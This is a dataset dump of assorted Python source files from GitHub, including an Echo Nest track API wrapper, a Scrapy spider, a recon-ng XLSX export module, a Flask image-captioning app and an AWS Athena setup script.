result['response']['track']['status'].lower()\n # Slowly increment to wait longer each time.\n timeout_counter += timeout_counter / 2\n return result\n\ndef _track_from_response(result, timeout):\n \"\"\"\n This is the function that actually creates the track object\n \"\"\"\n response = result['response']\n status = response['track']['status'].lower()\n\n if status == 'pending':\n # Need to wait for async upload or analyze call to finish.\n result = _wait_for_pending_track(response['track']['id'], timeout)\n response = result['response']\n status = response['track']['status'].lower()\n\n if not status == 'complete':\n track_id = response['track']['id']\n if status == 'pending':\n raise Exception('%s: the operation didn\\'t complete before the timeout (%d secs)' %\n (track_id, timeout))\n else:\n raise Exception('%s: there was an error analyzing the track, status: %s' % (track_id, status))\n else:\n # track_properties starts as the response dictionary.\n track_properties = response['track']\n # 'id' and 'md5' are separated to construct the Track object.\n identifier = track_properties.pop('id')\n md5 = track_properties.pop('md5', None) # tracks from song api calls will not have an md5\n # Pop off the audio_summary dict and make those keys attributes\n # of the Track. This includes things like tempo, energy, and loudness.\n track_properties.update(track_properties.pop('audio_summary'))\n return Track(identifier, md5, track_properties)\n\ndef _upload(param_dict, timeout, data):\n \"\"\"\n Calls upload either with a local audio file,\n or a url. 
Returns a track object.\n \"\"\"\n param_dict['format'] = 'json'\n param_dict['wait'] = 'true'\n param_dict['bucket'] = 'audio_summary'\n result = util.callm('track/upload', param_dict, POST = True, socket_timeout = 300, data = data)\n return _track_from_response(result, timeout)\n\ndef _profile(param_dict, timeout):\n param_dict['format'] = 'json'\n param_dict['bucket'] = 'audio_summary'\n result = util.callm('track/profile', param_dict)\n return _track_from_response(result, timeout)\n\n\n\"\"\" Below are convenience functions for creating Track objects, you should use them \"\"\"\n\ndef _track_from_data(audio_data, filetype, timeout):\n param_dict = {}\n param_dict['filetype'] = filetype\n return _upload(param_dict, timeout, audio_data)\n\ndef track_from_file(file_object, filetype, timeout=DEFAULT_ASYNC_TIMEOUT, force_upload=False):\n \"\"\"\n Create a track object from a file-like object.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n file_object: a file-like Python object\n filetype: the file type. Supported types include mp3, ogg, wav, m4a, mp4, au\n force_upload: skip the MD5 shortcut path, force an upload+analysis\n Example:\n >>> f = open(\"Miaow-01-Tempered-song.mp3\")\n >>> t = track.track_from_file(f, 'mp3')\n >>> t\n < Track >\n >>>\n \"\"\"\n if not force_upload:\n try:\n # Check if this file has already been uploaded.\n # This is much faster than uploading.\n md5 = hashlib.md5(file_object.read()).hexdigest()\n return track_from_md5(md5)\n except util.EchoNestAPIError:\n # Fall through to do a fresh upload.\n pass\n\n file_object.seek(0)\n return _track_from_data(file_object.read(), filetype, timeout)\n\ndef track_from_filename(filename, filetype = None, timeout=DEFAULT_ASYNC_TIMEOUT, force_upload=False):\n \"\"\"\n Create a track object from a filename.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n filename: A string containing the path to the input file.\n filetype: A string indicating the filetype; Defaults to None (type determined by file extension).\n force_upload: skip the MD5 shortcut path, force an upload+analysis\n\n Example:\n >>> t = track.track_from_filename(\"Miaow-01-Tempered-song.mp3\")\n >>> t\n < Track >\n >>>\n \"\"\"\n filetype = filetype or filename.split('.')[-1]\n file_object = open(filename, 'rb')\n result = track_from_file(file_object, filetype, timeout, force_upload)\n file_object.close()\n return result\n\ndef track_from_url(url, timeout=DEFAULT_ASYNC_TIMEOUT):\n \"\"\"\n Create a track object from a public http URL.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n url: A string giving the URL to read from. This must be on a public machine accessible by HTTP.\n\n Example:\n >>> t = track.track_from_url(\"http://www.miaowmusic.com/mp3/Miaow-01-Tempered-song.mp3\")\n >>> t\n < Track >\n >>>\n\n \"\"\"\n param_dict = dict(url = url)\n return _upload(param_dict, timeout, data=None)\n\ndef track_from_id(identifier, timeout=DEFAULT_ASYNC_TIMEOUT):\n \"\"\"\n Create a track object from an Echo Nest track ID.\n\n NOTE: Does not create the detailed analysis for the Track. 
Call\n Track.get_analysis() for that.\n\n Args:\n identifier: A string containing the ID of a previously analyzed track.\n\n Example:\n >>> t = track.track_from_id(\"TRWFIDS128F92CC4CA\")\n >>> t\n \n >>>\n \"\"\"\n param_dict = dict(id = identifier)\n return _profile(param_dict, timeout)\n\ndef track_from_md5(md5, timeout=DEFAULT_ASYNC_TIMEOUT):\n \"\"\"\n Create a track object from an md5 hash.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n md5: A string 32 characters long giving the md5 checksum of a track already analyzed.\n\n Example:\n >>> t = track.track_from_md5('b8abf85746ab3416adabca63141d8c2d')\n >>> t\n \n >>>\n \"\"\"\n param_dict = dict(md5 = md5)\n return _profile(param_dict, timeout)\n","repo_name":"echonest/pyechonest","sub_path":"pyechonest/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":661,"dataset":"github-code","pt":"66"} +{"seq_id":"13899428057","text":"from scrapy import Spider\r\n\r\nfrom ..items import RequimentItem\r\nimport scrapy\r\n\r\n\r\nclass CareerbuilderSpider(Spider):\r\n name = 'devwork'\r\n allowed_domains = ['devwork.vn']\r\n start_urls = [\r\n 'https://devwork.vn/job/search?name-seach=&category-jod=0&location-jod=1&wage-job-from=&wage-job-to'\r\n '=&workingfrom_job=1&_token=4sCfy1EVjFElJayDIuzSBA139ENtPuoHmozjr9eB&page=23',\r\n ]\r\n\r\n def parse(self, response):\r\n all_job = response.xpath('//div[@class=\"job-list-content\"]')\r\n\r\n for job in all_job:\r\n job_url = job.xpath('./h4/a/@href').extract_first()\r\n\r\n yield scrapy.Request(job_url, callback=self.parse_job)\r\n\r\n next_page_url = response.xpath('//li[@class=\"page-item\"]/a/@href').extract_first()\r\n yield scrapy.Request(next_page_url, callback=self.parse)\r\n\r\n def parse_job(self, response):\r\n item = RequimentItem()\r\n item['title'] = response.xpath('normalize-space(/html/body/section[1]/div/div/div/div[2]/h1/text())').extract()\r\n item['mo_ta'] = response.xpath('//div[@class=\"jod-detail-content-request col-md-12\"]/text()').extract()\r\n if item['mo_ta'] is None:\r\n item['mo_ta'] = response.xpath(\r\n '//div[@class=\"jod-detail-content-request col-md-12\"]/p/span/text()').extract()\r\n item['yeu_cau'] = response.xpath('/html/body/section[2]/div/div/div[1]/div[4]/div/text()').extract()\r\n if item['yeu_cau'] is None:\r\n item['yeu_cau'] = response.xpath('/html/body/section[2]/div/div/div[1]/div[4]/div/p/span/text()').extract()\r\n\r\n yield item\r\n","repo_name":"nhpquy/code_trainer","sub_path":"Scrapy/requiment/requiment/spiders/devwork.py","file_name":"devwork.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2842965771","text":"from recon.core.module import BaseModule\nimport os\nimport xlsxwriter\n\nclass Module(BaseModule):\n\n meta = {\n 'name': 'XLSX File Creator',\n 'author': 'Tim Tomes (@LaNMaSteR53)',\n 'description': 'Creates an Excel compatible XLSX file containing the entire data set.',\n 'options': (\n ('filename', os.path.join(BaseModule.workspace, 'results.xlsx'), True, 'path and filename for output'),\n ),\n }\n\n def module_run(self):\n filename = self.options['filename']\n # create an new xlsx file\n with xlsxwriter.Workbook(filename, {'strings_to_urls': False}) as workbook:\n tables = self.get_tables()\n # loop through all tables in the database\n for table in tables:\n # create a worksheet for 
the table\n worksheet = workbook.add_worksheet(table)\n # build the data set\n rows = [tuple([x[0] for x in self.get_columns(table)])]\n rows.extend(self.query('SELECT * FROM \"%s\"' % (table)))\n # write the rows of data to the xlsx file\n for r in range(0, len(rows)):\n for c in range(0, len(rows[r])):\n worksheet.write(r, c, rows[r][c])\n self.output('All data written to \\'%s\\'.' % (filename))\n","repo_name":"sabri-zaki/EasY_HaCk","sub_path":".modules/.recon-ng/modules/reporting/xlsx.py","file_name":"xlsx.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1668,"dataset":"github-code","pt":"66"} +{"seq_id":"34206614577","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom textwrap import fill\n\nfiles = ['Klasyfikator', 'Cecha', 'UsunieteCechy']\ncharts = ['Klasyfikatory', 'Cechy', 'Usunięte Cechy']\nxlabels = ['Średnia Precyzja', 'Średnia Dokładność', 'Średnia Czułość']\n\nfor file_name, charts_names in zip(files, charts):\n classifiers = pd.read_csv(file_name + '.csv', sep=';', header=0)\n\n for index, row, in classifiers.iterrows():\n row_results = []\n row_results.append(row['Średnia Precyzja'])\n row_results.append(row['Średnia Dokładność'])\n row_results.append(row['Średnia Czułość'])\n \n plt.plot(xlabels, row_results, zorder=3)\n plt.scatter(x=xlabels, y=row_results, label=fill(row['Nazwa'], 15), zorder=6)\n\n plt.grid(alpha=0.2, zorder=0)\n plt.xlabel('Metryka')\n plt.ylabel('Wartość')\n plt.title(charts_names)\n plt.tight_layout()\n ax = plt.subplot(111)\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width*0.7, box.height])\n legend_x = 1\n legend_y = 0.5\n plt.legend(loc='center left', bbox_to_anchor=(legend_x, legend_y))\n plt.savefig(file_name + '.png', dpi=300)\n plt.close()\n\n\n i = 0\n clas = len(classifiers.index)\n for index, row, in classifiers.iterrows():\n plt.bar(i * clas, row['Średni Czas'], label=fill(row['Nazwa'], 15), zorder=3)\n i = i + 0.15\n\n plt.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n plt.grid(alpha=0.2, zorder=0)\n plt.xlabel('Średni czas')\n plt.ylabel('Czas (s)')\n plt.title(charts_names)\n plt.tight_layout()\n ax = plt.subplot(111)\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width*0.65, box.height])\n legend_x = 1\n legend_y = 0.5\n plt.legend(loc='center left', bbox_to_anchor=(legend_x, legend_y))\n plt.savefig(file_name + '_Czas.png', dpi=300)\n plt.close()\n\n ","repo_name":"Podlewski/MUM","sub_path":"Projekt/ny_felony_analysis/classification/charter.py","file_name":"charter.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72697036051","text":"from flask import render_template, flash, redirect, url_for # request, send_from_directory\nfrom app import app # db\nfrom pickle import load\nfrom keras.models import load_model\nfrom keras import backend\nfrom app.forms import PhotoForm, CaptionForm\nfrom app.model import extract_features_2, generate_caption\n# from app.database import Image\nfrom werkzeug.utils import secure_filename\n# import os\nimport boto3\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n form = PhotoForm()\n if form.validate_on_submit():\n f = form.photo.data\n filename = secure_filename(f.filename)\n # f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # os.rename(os.path.join(app.config['UPLOAD_FOLDER'], 
filename), os.path.join(app.config['DISPLAY_FOLDER'], filename))\n # path = os.path.join(app.config['FINAL_FOLDER'], filename)\n\n s3 = boto3.resource('s3')\n\n if filename.rsplit('.', 1)[1].lower() in set(['jpg', 'jpeg']):\n # s3.Bucket('caption-maker-bucket').put_object(Key='image_{}.jpg'.format(db.session.query(Image).count()+1), Body=f)\n # stored_as = 'image_{}.jpg'.format(db.session.query(Image).count()+1)\n # image = Image(filepath = 'https://s3.amazonaws.com/caption-maker-bucket/' + stored_as, caption = caption)\n stored_as = 'uploaded_image.jpg'\n s3.Bucket('caption-maker-bucket').put_object(Key=stored_as, Body=f)\n\n elif filename.rsplit('.', 1)[1].lower() in set(['png']):\n stored_as = 'uploaded_image.png'\n s3.Bucket('caption-maker-bucket').put_object(Key='uploaded_image.png', Body=f)\n \n # db.session.add(image)\n # db.session.commit()\n\n # flash(caption)\n return redirect(url_for('caption', filename = stored_as))\n return render_template('index.html', title = 'The Caption App', form = form)\n\n@app.route('/caption/', methods=['GET', 'POST'])\ndef caption(filename):\n # image = Image.query.filter_by(id = db.session.query(Image).count()).first_or_404()\n # caption = image.caption\n backend.clear_session()\n\n # load the tokenizer\n tokenizer = load(open('app/tokenizer.pkl', 'rb'))\n # hard-code max sequence length\n max_length = app.config['MAX_LENGTH']\n # load the model parameters\n model = load_model('app/resnet_model-ep03-loss3.586-val_loss3.777.h5')\n\n form = CaptionForm()\n if form.validate_on_submit():\n s3_client = boto3.client('s3')\n image = s3_client.get_object(Bucket='caption-maker-bucket',Key=filename)['Body']\n # image = 'https://s3.amazonaws.com/caption-maker-bucket/' + filename\n\n # prepare the photograph\n photo = extract_features_2(image)\n\n # generate the caption\n caption = generate_caption(model, photo, tokenizer, max_length)\n\n return render_template('caption.html', title = 'Generated Caption', filename = filename, caption = caption)\n return render_template('caption.html', title = 'Generate Caption', filename = filename, form = form)\n\n# page describing use cases\n# option for caption to be read aloud\n# top vocab words and their counts","repo_name":"kadakia/caption_app","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36225655947","text":"\"\"\"\nThe Parser module provides the tools required to parse URLs.\n\n\"\"\"\nimport importlib\nimport hashlib\nimport pkg_resources\nimport re\nimport random\nimport sys\nimport urllib2\nfrom lxml import etree\nfrom libscraper.exceptions import TargetPatternNotFound\n\n\nclass Tree(object):\n\n def __init__(self, code=500, ptype='--', url='--', root=None, msg=''):\n self._ptype = ptype\n self._code = code\n self._url = url\n self._root = root\n self._msg = msg\n\n def __str__(self):\n prt = self._msg if self._root is None else self._root\n return \"[{:s}] {:d} \\\"{:s}\\\" {!s}\".format(self._ptype, self._code, self._url, prt)\n\n\nclass BaseParser(object):\n\n def __init__(self, scraper):\n self.scraper = scraper\n self._targets = scraper._targets\n\n def urlinfo(self, url, init=False):\n \"\"\"\n Extract information from a raw URL.\n Attempts to match a URL to a known site pattern.\n\n Returns Parser model if found.\n\n \"\"\"\n url = url.split('?').pop(0) # Remove any querystring\n match = None\n for target in self._targets:\n for pattern in 
target._patterns:\n s = pattern.search(url)\n if s is not None:\n match = target.get_info()\n match['info'] = list(s.groups())\n break\n if init and match:\n parser_model = match['parser'] + '.py'\n models = pkg_resources.resource_listdir('models', '')\n if parser_model in models:\n # Load module\n module = importlib.import_module('.'+parser_model[:-3], 'models')\n # Replace parser with Parser instance\n parser = module.Parser(self.scraper) \n match['parser'] = parser\n # Load info from fixtures\n match.update(parser.get_urlinfo(match))\n break\n if not match:\n raise TargetPatternNotFound()\n return {}\n if not init:\n match.update(self.get_urlinfo(match))\n return match\n\n def __connect(self, url, headers=None, proxy=None):\n timeout = 10 # set timeout at 10 seconds\n request = urllib2.Request(url)\n if headers is not None:\n for header in headers:\n request.add_header(header['name'], header['value'])\n user_agents = [\n \"Mozilla/5.0 (Linux i686)\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.60 Safari/537.1\",\n ]\n request.add_header('User-agent', user_agents[random.randint(0, len(user_agents)-1)])\n if proxy is not None:\n proxy_handler = urllib2.ProxyHandler({'http':proxy})\n opener = urllib2.build_opener(proxy_handler)\n else:\n opener = urllib2.build_opener()\n r = opener.open(request, timeout=timeout)\n return r\n\n def get_hash(self, hashbag=[]):\n if not hashbag:\n return None\n return hashlib.sha256(','.join([str(i) for i in hashbag])).hexdigest()\n\n def parse(self, url, headers=None, proxy=None):\n \"\"\"\n Parse URL to a Tree object.\n All URLs are parsed as XML/XHTML, defaulting to HTML when an XML syntax error is found.\n\n -- headers list of request HTTP headers\n -- proxy proxy format: \"IP:port\"\n\n \"\"\"\n try:\n response = self.__connect(url, headers, proxy)\n except urllib2.HTTPError as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, code=e.code, msg=e.msg)\n except urllib2.URLError as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, code=404, msg=e.reason)\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n try:\n output = response.read()\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n try:\n ptype = 'XML'\n root = etree.fromstring(output, etree.XMLParser(encoding='utf-8'))\n except etree.XMLSyntaxError:\n try:\n ptype = 'HTML'\n root = etree.fromstring(output, etree.HTMLParser(encoding='utf-8'))\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n if type(root) is not etree._Element:\n root = None\n return Tree(ptype=ptype, code=response.code, url=response.geturl(), root=root)\n\n def get_deals(self, url):\n \"\"\"\n The method should gather the following information:\n - title Main headline\n - headline Sub-headline\n - link Full URI\n - rel_id Local ID (integer)\n - pubDate Publication date (datetime.datetime)\n - site Site name\n - locale Locale code\n - location Location\n - category Category\n - hashid SHA256 hash (used to uniquely identify a deal)\n\n \"\"\"\n return []\n\n def get_deal(self, url):\n \"\"\"\n The method should gather the following 
information:\n - status If the deal is sold out or expired\n - merchant Merchant name\n - merchant_url Merchant site URL\n - addresses A list of address lines (as Dictionaries)\n - rrp Displayed (or computed) RRP\n - price Displayed price\n - volume Displayed sales amount\n\n \"\"\"\n return {}\n","repo_name":"mgiuliano/libscraper","sub_path":"libscraper/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11182565644","text":"import random\n\n# Define a list of keywords and their corresponding responses\nkeywords = {\n \"hello\": [\"Hi there!\", \"Hello!\", \"Greetings!\"],\n \"goodbye\": [\"Goodbye!\", \"See you later!\", \"Farewell!\"],\n \"thanks\": [\"You're welcome!\", \"No problem!\", \"Glad to help!\"],\n \"name\": [\"My name is Chatbot.\", \"I'm Chatbot.\", \"You can call me Chatbot.\"],\n \"work\":[\"My work is to help you.\"]\n}\n\n# Initialize the chatbot\ndef chatbot():\n print(\"Hello, I'm Chatbot. How can I help you?\")\n \n # Loop to keep the chatbot running\n while True:\n # Get user input\n user_input = input(\"> \").lower()\n \n # Check for keywords and respond with a random message\n if \"hello\" in user_input:\n response = random.choice(keywords[\"hello\"])\n elif \"goodbye\" in user_input:\n response = random.choice(keywords[\"goodbye\"])\n elif \"thanks\" in user_input or \"thank you\" in user_input:\n response = random.choice(keywords[\"thanks\"])\n elif \"name\" in user_input:\n response = random.choice(keywords[\"name\"])\n elif \"work\" in user_input:\n response = random.choice(keywords[\"work\"]) \n else:\n response = \"I'm sorry, I don't understand.\"\n \n # Print the response\n print(response)\n\n# Run the chatbot\nchatbot()\n","repo_name":"dishita-222/AI","sub_path":"basicchat.py","file_name":"basicchat.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43476569923","text":"from vinum import *\nfrom common import *\n\n\n@app.route('/client/get', methods=['GET'])\n@login_required\ndef get_clients():\n return get(g, request, {'client': 'c', 'representant': 'r'},\n ('nom_social', 'no_client_saq', 'no_tel', 'courriel',\n 'no_tel_personnel', 'no_cellulaire', 'note_client',\n 'nom_responsable'), join={'c.representant_id': 'r.representant_id'})\n\n\n@app.route('/client/load', methods=['POST'])\n@login_required\ndef load_client():\n client = pg.select1r(g.db.cursor(), {'client': 'c', 'representant': 'r'},\n join={'c.representant_id': 'r.representant_id'},\n where={'no_client': request.form['no_client']})\n # !!! 
this should be in the database\n client['default_commission'] = 0.16 if client['type_client'] == 'restaurant' else 0.23\n if 'format_note' in request.form and client['note_client']:\n client['note_client'] = client['note_client'].replace('\\n', ' ')\n return {'success': True, 'data': client}\n\n\n@app.route('/client/save', methods=['POST'])\n@login_required\ndef save_client():\n rf = request.form.to_dict()\n rf['jours_livraison'] = request.form.getlist('jours_livraison')\n no_client = rf.pop('no_client')\n if no_client == '': no_client = None\n else: rf['no_client'] = no_client # to allow resaving it back after delete with the same id\n rf['representant_id'] = pg.selectId(g.db.cursor(), 'representant',\n where={'representant_nom': rf.get('representant_nom')})\n if rf['expedition'] != 'direct':\n rf['jours_livraison'] = None\n if rf['expedition'] != 'succursale':\n rf['no_succursale_saq'] = None\n client = pg.upsert(g.db.cursor(), 'client', where={'no_client': no_client},\n values=rf, filter_values=True, map_values={'': None})\n g.db.commit()\n return {'success': True, 'data': client}\n\n\n@app.route('/client/delete', methods=['POST'])\n@login_required\ndef delete_client():\n pg.delete(g.db.cursor(), 'client', where={'no_client': request.form['no_client']},\n tighten_sequence=True)\n g.db.commit()\n return {'success': True}\n\n\n@app.route('/client/remove_produit', methods=['POST'])\n@login_required\ndef remove_produit():\n cursor = g.db.cursor()\n request.form = dict([(c, f if f else None) for c, f in request.form.items()])\n pg.delete(cursor, 'client_produit',\n where={'no_client': request.form['no_client'],\n 'no_produit_interne': request.form['no_produit_interne']},\n tighten_sequence=True)\n g.db.commit()\n return {'success': True}\n\n\n@app.route('/client/add_produit', methods=['POST'])\n@login_required\ndef add_produit():\n cursor = g.db.cursor()\n request.form = dict([(c, f if f else None) for c, f in request.form.items()])\n no_produit_interne = pg.select1(cursor, 'produit', 'no_produit_interne', where={'type_vin': request.form['type_vin']})\n pg.insert(cursor, 'client_produit', values={'no_client': request.form['no_client'],\n 'no_produit_interne': no_produit_interne})\n g.db.commit()\n return {'success': True}\n","repo_name":"josecerejo/vinum","sub_path":"python/vinum/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4369815147","text":"import torch.nn as nn\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_features, hidden_size=512, kernel_size=9, dropout=0.15):\n super().__init__()\n\n self.conv = nn.Sequential(\n nn.Conv2d(\n in_channels=1,\n out_channels=hidden_size // 4,\n kernel_size=(kernel_size, in_features),\n padding=(kernel_size // 2, 0),\n ),\n nn.BatchNorm2d(hidden_size // 4),\n nn.ELU(),\n nn.Dropout(p=dropout),\n nn.Conv2d(\n in_channels=hidden_size // 4,\n out_channels=hidden_size // 2,\n kernel_size=(kernel_size, 1),\n padding=(kernel_size // 2, 0),\n ),\n nn.BatchNorm2d(hidden_size // 2),\n nn.ELU(),\n nn.Dropout(p=dropout),\n nn.Conv2d(\n in_channels=hidden_size // 2,\n out_channels=hidden_size,\n kernel_size=(kernel_size, 1),\n padding=(kernel_size // 2, 0),\n ),\n nn.BatchNorm2d(hidden_size),\n nn.ELU(),\n nn.Dropout(p=dropout),\n )\n\n def forward(self, x):\n # x: (batch_size, sequence_length, in_features)\n x = x.unsqueeze(1) # (batch_size, 1, sequence_length, in_features)\n x = self.conv(x) # (batch_size, 
hidden_size, sequence_length, 1)\n x = x.squeeze(3).transpose(1, 2) # (batch_size, sequence_length, hidden_size)\n return x\n\n\nclass GRUBlock(nn.Module):\n def __init__(self, in_features, hidden_size=512, gru_layers=2, dropout=0.15):\n super().__init__()\n\n self.grus_beat = nn.GRU(\n input_size=in_features,\n hidden_size=hidden_size,\n num_layers=gru_layers,\n batch_first=True,\n dropout=dropout,\n bidirectional=True,\n )\n self.linear = nn.Linear(hidden_size*2, hidden_size)\n\n def forward(self, x):\n # x: (batch_size, sequence_length, hidden_size)\n\n x, _ = self.grus_beat(x) # (batch_size, sequence_length, hidden_size*2)\n x = self.linear(x) # (batch_size, sequence_length, hidden_size)\n\n return x\n\n\nclass LinearOutput(nn.Module):\n def __init__(self, in_features, out_features, activation_type='sigmoid', dropout=0.15):\n super().__init__()\n\n self.activation_type = activation_type\n\n self.dropout = nn.Dropout(p=dropout)\n self.linear = nn.Linear(in_features, out_features)\n\n if activation_type == 'sigmoid':\n self.activation = nn.Sigmoid()\n elif activation_type == 'softmax':\n self.activation = nn.LogSoftmax(dim=2)\n elif activation_type == 'softplus':\n self.activation = nn.Softplus()\n\n def forward(self, x):\n # x: (batch_size, sequence_length, in_features)\n\n x = self.dropout(x) # (batch_size, sequence_length, in_features)\n x = self.linear(x) # (batch_size, sequence_length, out_features)\n x = self.activation(x) # (batch_size, sequence_length, out_features)\n\n return x","repo_name":"cheriell/PM2S","sub_path":"pm2s/models/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"66"} +{"seq_id":"10709096047","text":"# _*_ coding:utf-8 _*_\n# @File : user_folder.py\n# @Time : 2020-09-29 08:10\n# @Author: zizle\nfrom fastapi import APIRouter, Depends, Body, HTTPException, Query\nfrom utils.verify import oauth2_scheme, decipher_user_token\nfrom utils.client import encryption_uuid\nfrom db.mysql_z import MySqlZ\nfrom .models import UpdateFolderItem\nfolder_router = APIRouter()\n\n\n@folder_router.post(\"/industry/user-folder/\", summary=\"用户配置更新文件夹\")\nasync def create_update_folder(\n user_token: str = Depends(oauth2_scheme),\n body_item: UpdateFolderItem = Body(...)\n):\n user_id, _ = decipher_user_token(user_token)\n if not user_id:\n raise HTTPException(status_code=401, detail=\"Unknown User\")\n body_item.client = encryption_uuid(body_item.client, user_id) # 加密改变uuid与客户端数据库对应\n # 查询增加或更新\n with MySqlZ() as cursor:\n cursor.execute(\n \"SELECT id,user_id FROM industry_user_folder \"\n \"WHERE client=%s AND user_id=%s AND variety_en=%s AND group_id=%s;\",\n (body_item.client, user_id, body_item.variety_en, body_item.group_id)\n )\n is_exist = cursor.fetchone()\n if is_exist: # 存在则更新\n cursor.execute(\n \"UPDATE industry_user_folder SET folder=%s \"\n \"WHERE client=%s AND variety_en=%s AND group_id=%s AND user_id=%s;\",\n (body_item.folder_path, body_item.client, body_item.variety_en, body_item.group_id, user_id)\n )\n else:\n cursor.execute(\n \"INSERT INTO industry_user_folder (variety_en,group_id,folder,client,user_id) \"\n \"VALUES (%s,%s,%s,%s,%s);\",\n (body_item.variety_en, body_item.group_id, body_item.folder_path, body_item.client, user_id)\n )\n return {\"message\": \"配置成功!\"}\n\n\n@folder_router.get(\"/industry/user-folder/\", summary=\"查询用户配置更新文件夹\")\nasync def get_update_folder(\n user_token: str = Depends(oauth2_scheme),\n variety_en: str = 
Query(...),\n group_id: int = Query(0, ge=0),\n client: str = Query('', min_length=36, max_length=36)\n):\n user_id, _ = decipher_user_token(user_token)\n if not user_id:\n raise HTTPException(status_code=401, detail=\"Unknown User\")\n client = encryption_uuid(client, user_id) # 加密uuid与数据库对应\n with MySqlZ() as cursor:\n cursor.execute(\n \"SELECT varitytb.variety_name,grouptb.group_name,foldertb.folder \"\n \"FROM industry_user_folder AS foldertb,basic_variety AS varitytb,industry_sheet_group AS grouptb \"\n \"WHERE foldertb.variety_en=varitytb.variety_en \"\n \"AND foldertb.group_id=grouptb.id AND \"\n \"foldertb.client=%s AND foldertb.variety_en=%s AND foldertb.user_id=%s AND \"\n \"IF(%s=0,TRUE,foldertb.group_id=%s);\",\n (client, variety_en, user_id, group_id, group_id)\n )\n folders = cursor.fetchall()\n return {\"message\": \"查询成功!\", \"folders\": folders}\n\n","repo_name":"zizle/FuturesAssistant","sub_path":"modules/industry/user_folder.py","file_name":"user_folder.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4245626061","text":"from logging import exception\nimport boto3\nimport json,time\n\n# A session stores configuration state and allows you to create service clients and resources \n\n\nsession = boto3.Session(profile_name='working-dev')\n\nathene_client = session.client('athena')\n\ns3 = session.client('s3')\n\nbucket_name ='userdata'\n\n# Binary files and network io (stores data in ram)\nwith open('social_media_data/social_media.csv', 'rb') as r:\n s3.upload_fileobj(r, bucket_name, 'social_media_files.csv')\n\n#Similar behavior as S3Transfer's upload_file() method, except that parameters are capitalized. Detailed examples can be #found at S3Transfer's Usage.\ns3.upload_file(\n Filename='social_media_data/social media visitors.csv' ,\n Bucket=bucket_name,\n Key='social_media_files/social media visitors.csv')\n\n\n# first need to create a workgroup only once\n\ntry:\n response = athene_client.create_work_group(\n Name='data-analysis-wg',\n Configuration={\n 'ResultConfiguration': {\n 'OutputLocation': f's3://{bucket_name}/athena_workgroup',\n 'EncryptionConfiguration': {\n 'EncryptionOption': 'SSE_S3'\n \n }\n \n },\n 'EnforceWorkGroupConfiguration': True,\n 'PublishCloudWatchMetricsEnabled': True,\n 'RequesterPaysEnabled': True\n },\n Description='Athena work group'\n \n )\nexcept Exception as e:\n pass\n\n# create metadata database in athena \n\ncreate_database = \"\"\" create database if not exists social_media_db\"\"\"\n\ndb = athene_client.start_query_execution(\n QueryString=create_database,\n WorkGroup='data-analysis-wg'\n)\n\n#schema \ndata_catalog_query = f\"\"\" CREATE EXTERNAL TABLE if not exists social_media_db.socialmedia (\n `ID` string,\n `Datef` date,\n `DailyEngaged_Users` string,\n `MonthlyEngagedUsers` string,\n `WeeklyPageEngagedUsers` string,\n `LifetimeTotalLikes` string,\n `DailyotalReach` string,\n `WeeklytotalReach` string,\n `TotalMonthlyReach` string\n )\n ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe'\n WITH SERDEPROPERTIES (\n 'serialization.format' = ',',\n 'field.delim' = ','\n ) LOCATION 's3://{bucket_name}/social_media_files.csv'\n TBLPROPERTIES ('has_encrypted_data'='false') \"\"\"\n\n\n# get the responce \n\nresponce = athene_client.start_query_execution(\n QueryString=data_catalog_query,\n 